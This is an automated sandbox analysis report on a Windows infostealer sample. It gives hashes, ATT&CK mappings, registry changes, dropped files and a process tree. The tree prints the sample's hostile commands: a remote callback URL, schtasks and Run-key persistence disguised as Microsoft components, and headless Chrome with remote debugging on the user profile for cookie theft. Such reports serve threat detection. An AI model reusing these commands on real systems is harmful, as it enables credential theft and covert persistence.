66b6a919c0964c8c9796059010d23defd9d6569e29efb16270b61df0dda2d6d1

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
18-02-2025 08:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-02-18_bbeb66cbf8e63cd7779f4369807172f6_frostygoop_luca-stealer_poet-rat_snatch.exe
Size

7.9MB
MD5

bbeb66cbf8e63cd7779f4369807172f6
SHA1

44fe19a29c2de7bad8fb83c5c295d772e80e9351
SHA256

66b6a919c0964c8c9796059010d23defd9d6569e29efb16270b61df0dda2d6d1
SHA512

9c29a4ab8c7bc4cebfb56dc474230b5af5daf6dc05de8a682c09e523b64d6fdc0d4b199a8d2618c5a5da34c047dfd6ac423366b6ec66002f00095ce6858edb5c
SSDEEP

98304:n/vXYEqxkpM36eN6TC+HEisW28Ltd3VL7eKnODkmKNA1:1ekpMATAiP9L7eBgE

Score

8^/10

credential_access persistence spyware stealer

Malware Config

Signatures

Uses browser remote debugging 2 TTPs 1 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
2684	chrome.exe

Executes dropped EXE 1 IoCs

pid	Process
1912	pythonw.exe

Loads dropped DLL 16 IoCs

pid	Process
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Display Driver Manager = "C:\\Users\\Admin\\AppData\\Roaming\\DisplayUpdater.exe"	pythonw.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5	api.ipify.org
6	api.ipify.org
8	ip-api.com

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	9	Go-http-client/1.1

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
708	taskkill.exe

Modifies system certificate store 2 TTPs 3 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	2025-02-18_bbeb66cbf8e63cd7779f4369807172f6_frostygoop_luca-stealer_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	2025-02-18_bbeb66cbf8e63cd7779f4369807172f6_frostygoop_luca-stealer_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	2025-02-18_bbeb66cbf8e63cd7779f4369807172f6_frostygoop_luca-stealer_poet-rat_snatch.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4920	schtasks.exe

Suspicious behavior: EnumeratesProcesses 52 IoCs

pid	Process
4860	2025-02-18_bbeb66cbf8e63cd7779f4369807172f6_frostygoop_luca-stealer_poet-rat_snatch.exe
4860	2025-02-18_bbeb66cbf8e63cd7779f4369807172f6_frostygoop_luca-stealer_poet-rat_snatch.exe
4860	2025-02-18_bbeb66cbf8e63cd7779f4369807172f6_frostygoop_luca-stealer_poet-rat_snatch.exe
4860	2025-02-18_bbeb66cbf8e63cd7779f4369807172f6_frostygoop_luca-stealer_poet-rat_snatch.exe
4860	2025-02-18_bbeb66cbf8e63cd7779f4369807172f6_frostygoop_luca-stealer_poet-rat_snatch.exe
4860	2025-02-18_bbeb66cbf8e63cd7779f4369807172f6_frostygoop_luca-stealer_poet-rat_snatch.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
1912	pythonw.exe
2684	chrome.exe
2684	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1912	pythonw.exe
Token: SeDebugPrivilege	708	taskkill.exe
Token: SeIncreaseQuotaPrivilege	4908	wmic.exe
Token: SeSecurityPrivilege	4908	wmic.exe
Token: SeTakeOwnershipPrivilege	4908	wmic.exe
Token: SeLoadDriverPrivilege	4908	wmic.exe
Token: SeSystemProfilePrivilege	4908	wmic.exe
Token: SeSystemtimePrivilege	4908	wmic.exe
Token: SeProfSingleProcessPrivilege	4908	wmic.exe
Token: SeIncBasePriorityPrivilege	4908	wmic.exe
Token: SeCreatePagefilePrivilege	4908	wmic.exe
Token: SeBackupPrivilege	4908	wmic.exe
Token: SeRestorePrivilege	4908	wmic.exe
Token: SeShutdownPrivilege	4908	wmic.exe
Token: SeDebugPrivilege	4908	wmic.exe
Token: SeSystemEnvironmentPrivilege	4908	wmic.exe
Token: SeRemoteShutdownPrivilege	4908	wmic.exe
Token: SeUndockPrivilege	4908	wmic.exe
Token: SeManageVolumePrivilege	4908	wmic.exe
Token: 33	4908	wmic.exe
Token: 34	4908	wmic.exe
Token: 35	4908	wmic.exe
Token: 36	4908	wmic.exe
Token: SeIncreaseQuotaPrivilege	4908	wmic.exe
Token: SeSecurityPrivilege	4908	wmic.exe
Token: SeTakeOwnershipPrivilege	4908	wmic.exe
Token: SeLoadDriverPrivilege	4908	wmic.exe
Token: SeSystemProfilePrivilege	4908	wmic.exe
Token: SeSystemtimePrivilege	4908	wmic.exe
Token: SeProfSingleProcessPrivilege	4908	wmic.exe
Token: SeIncBasePriorityPrivilege	4908	wmic.exe
Token: SeCreatePagefilePrivilege	4908	wmic.exe
Token: SeBackupPrivilege	4908	wmic.exe
Token: SeRestorePrivilege	4908	wmic.exe
Token: SeShutdownPrivilege	4908	wmic.exe
Token: SeDebugPrivilege	4908	wmic.exe
Token: SeSystemEnvironmentPrivilege	4908	wmic.exe
Token: SeRemoteShutdownPrivilege	4908	wmic.exe
Token: SeUndockPrivilege	4908	wmic.exe
Token: SeManageVolumePrivilege	4908	wmic.exe
Token: 33	4908	wmic.exe
Token: 34	4908	wmic.exe
Token: 35	4908	wmic.exe
Token: 36	4908	wmic.exe
Token: SeShutdownPrivilege	2684	chrome.exe
Token: SeCreatePagefilePrivilege	2684	chrome.exe
Token: SeShutdownPrivilege	2684	chrome.exe
Token: SeCreatePagefilePrivilege	2684	chrome.exe
Token: SeShutdownPrivilege	2684	chrome.exe
Token: SeCreatePagefilePrivilege	2684	chrome.exe
Token: SeShutdownPrivilege	2684	chrome.exe
Token: SeCreatePagefilePrivilege	2684	chrome.exe
Token: SeShutdownPrivilege	2684	chrome.exe
Token: SeCreatePagefilePrivilege	2684	chrome.exe
Token: SeShutdownPrivilege	2684	chrome.exe
Token: SeCreatePagefilePrivilege	2684	chrome.exe
Token: SeShutdownPrivilege	2684	chrome.exe
Token: SeCreatePagefilePrivilege	2684	chrome.exe
Token: SeShutdownPrivilege	2684	chrome.exe
Token: SeCreatePagefilePrivilege	2684	chrome.exe
Token: SeShutdownPrivilege	2684	chrome.exe
Token: SeCreatePagefilePrivilege	2684	chrome.exe
Token: SeShutdownPrivilege	2684	chrome.exe
Token: SeCreatePagefilePrivilege	2684	chrome.exe

Suspicious use of WriteProcessMemory 63 IoCs

description	pid	Process	procid_target
PID 4860 wrote to memory of 2640	4860	2025-02-18_bbeb66cbf8e63cd7779f4369807172f6_frostygoop_luca-stealer_poet-rat_snatch.exe	87
PID 4860 wrote to memory of 2640	4860	2025-02-18_bbeb66cbf8e63cd7779f4369807172f6_frostygoop_luca-stealer_poet-rat_snatch.exe	87
PID 4860 wrote to memory of 5036	4860	2025-02-18_bbeb66cbf8e63cd7779f4369807172f6_frostygoop_luca-stealer_poet-rat_snatch.exe	88
PID 4860 wrote to memory of 5036	4860	2025-02-18_bbeb66cbf8e63cd7779f4369807172f6_frostygoop_luca-stealer_poet-rat_snatch.exe	88
PID 5036 wrote to memory of 1912	5036	cmd.exe	89
PID 5036 wrote to memory of 1912	5036	cmd.exe	89
PID 1912 wrote to memory of 1716	1912	pythonw.exe	90
PID 1912 wrote to memory of 1716	1912	pythonw.exe	90
PID 1912 wrote to memory of 1520	1912	pythonw.exe	92
PID 1912 wrote to memory of 1520	1912	pythonw.exe	92
PID 1912 wrote to memory of 708	1912	pythonw.exe	94
PID 1912 wrote to memory of 708	1912	pythonw.exe	94
PID 1912 wrote to memory of 4920	1912	pythonw.exe	96
PID 1912 wrote to memory of 4920	1912	pythonw.exe	96
PID 1912 wrote to memory of 4908	1912	pythonw.exe	98
PID 1912 wrote to memory of 4908	1912	pythonw.exe	98
PID 1912 wrote to memory of 2684	1912	pythonw.exe	100
PID 1912 wrote to memory of 2684	1912	pythonw.exe	100
PID 2684 wrote to memory of 4208	2684	chrome.exe	101
PID 2684 wrote to memory of 4208	2684	chrome.exe	101
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 4092	2684	chrome.exe	102
PID 2684 wrote to memory of 1864	2684	chrome.exe	103
PID 2684 wrote to memory of 1864	2684	chrome.exe	103

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2640	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2025-02-18_bbeb66cbf8e63cd7779f4369807172f6_frostygoop_luca-stealer_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2025-02-18_bbeb66cbf8e63cd7779f4369807172f6_frostygoop_luca-stealer_poet-rat_snatch.exe"
1⤵
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4860
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Roaming\DisplayUpdater.exe
  2⤵
  - Views/modifies file attributes
  PID:2640
- C:\Windows\system32\cmd.exe
  cmd.exe /C "set REALTEKAUDIO=https://postprocesser.com/.well-known/pki-validation/go/cinnamonroll.php?id=100000005 && set PROCNAME=2025-02-18_bbeb66cbf8e63cd7779f4369807172f6_frostygoop_luca-stealer_poet-rat_snatch.exe && start C:\Users\Admin\AppData\Local\Temp\tmp-938804610\python3\pythonw.exe C:\Users\Admin\AppData\Local\Temp\tmp-938804610\python3\exec.py"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5036
- - C:\Users\Admin\AppData\Local\Temp\tmp-938804610\python3\pythonw.exe
    C:\Users\Admin\AppData\Local\Temp\tmp-938804610\python3\pythonw.exe C:\Users\Admin\AppData\Local\Temp\tmp-938804610\python3\exec.py
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1912
  - - C:\Windows\system32\cmd.exe
      cmd.exe /C "echo %REALTEKAUDIO%"
      4⤵
      PID:1716
  - - C:\Windows\system32\cmd.exe
      cmd.exe /C "echo %PROCNAME%"
      4⤵
      PID:1520
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM chrome.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:708
  - - C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\Admin\AppData\Roaming\DisplayUpdater.exe /rl HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4920
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4908
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data"
      4⤵
      Uses browser remote debugging
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2684
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffadd25cc40,0x7ffadd25cc4c,0x7ffadd25cc58
        5⤵
        
        PID:4208
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --field-trial-handle=1440,i,16177797620542689189,14149835580971379299,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1432 /prefetch:2
        5⤵
        
        PID:4092
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --field-trial-handle=1852,i,16177797620542689189,14149835580971379299,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1848 /prefetch:3
        5⤵
        
        PID:1864

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Modify Authentication Process

T1556

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Authentication Process

T1556

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\tmp-938804610\python3\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp-938804610\python3\_ctypes.pyd

Filesize
121KB

MD5
565d011ce1cee4d48e722c7421300090

SHA1
9dc300e04e5e0075de4c0205be2e8aae2064ae19

SHA256
c148292328f0aab7863af82f54f613961e7cb95b7215f7a81cafaf45bd4c42b7

SHA512
5af370884b5f82903fd93b566791a22e5b0cded7f743e6524880ea0c41ee73037b71df0be9f07d3224c733b076bec3be756e7e77f9e7ed5c2dd9505f35b0e4f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp-938804610\python3\_hashlib.pyd

Filesize
63KB

MD5
b4ff25b1aca23d48897fc616e102e9b6

SHA1
8295ee478191eb5f741a5f6a3f4ab4576ceec8d2

SHA256
87dd0c858620287454fd6d31d52b6a48eddbb2a08e09e8b2d9fdb0b92200d766

SHA512
a7adcf652bc88f8878dae2742a37af75599936d80223e62fe74755d6bafaafd985678595872fb696c715f69a1f963f12e3d52cd3d7e7a83747983b2ee244e8a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp-938804610\python3\exec.py

Filesize
10KB

MD5
151e543b0a933702b2dcfd636c022d65

SHA1
4565bee62e880c8d1c16b2b3c99b24010504e540

SHA256
9c5da1f3330614fe56609fa92b9da4370622710341791599714dacde3a29499c

SHA512
0ca3d9b841ca147f22d211aa31c57125dada9c50e3b2592695b4209c8c3e7ceafe090175f195e3e1eb8655bc0390bf5b25459aca557c1f2c8b73a7cd324731cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp-938804610\python3\libcrypto-3.dll

Filesize
5.0MB

MD5
e547cf6d296a88f5b1c352c116df7c0c

SHA1
cafa14e0367f7c13ad140fd556f10f320a039783

SHA256
05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de

SHA512
9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp-938804610\python3\libffi-8.dll

Filesize
38KB

MD5
0f8e4992ca92baaf54cc0b43aaccce21

SHA1
c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

SHA256
eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

SHA512
6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp-938804610\python3\pyarmor_runtime_005724\__init__.py

Filesize
102B

MD5
20a749e1b4d9e0294c9e69176de69785

SHA1
cb298fd5177b5a7cda9f977f7f683acf73a30b95

SHA256
451a2e8763cd8a5738665c30cce68cd31992db7df4cd83dd9f8b40886ca5f4a2

SHA512
dbd1b634e4af506c25919a0a62619af29f844ce2dd6adf731e0dfe3f81e0f735f1aa1492127e3f0ef624ad5da656d5813af721c5fdfc61fe45c29cf04f26c6e6

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp-938804610\python3\pyarmor_runtime_005724\__pycache__\__init__.cpython-311.pyc

Filesize
263B

MD5
a339722b0a1f1440a7b8cc9d7fffef00

SHA1
1e390c9794ac6fb3333f3518965b81a4345e3bb0

SHA256
1c4aa6a5b9fb65a125dd002828d10017ef9f7ea2af2933c8411e71b5d21f1130

SHA512
eee42f7106545b5678392224464801bf1c8bf64ca08fa91f60d7c21259c25e1bd32afd7588b9c744489fc67696473b67a5158c134987ea998e9b74fc448f2143

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp-938804610\python3\pyarmor_runtime_005724\pyarmor_runtime.pyd

Filesize
616KB

MD5
b57373a36a88aa739a81f60f338af945

SHA1
97879306e56e9384661e8eb333470148adc2d203

SHA256
de0e9f826a781096d965c464055874173fe4447c5d199d3216a989eace825a82

SHA512
7aa4f34e219fff16861528a34eb7ec2ab06c120fe344aa2a7ccc83ece79fbddba44264f499af9e2ec4cd305b1494b6f3d5a41d8165f741b3e0589d767d62c72a

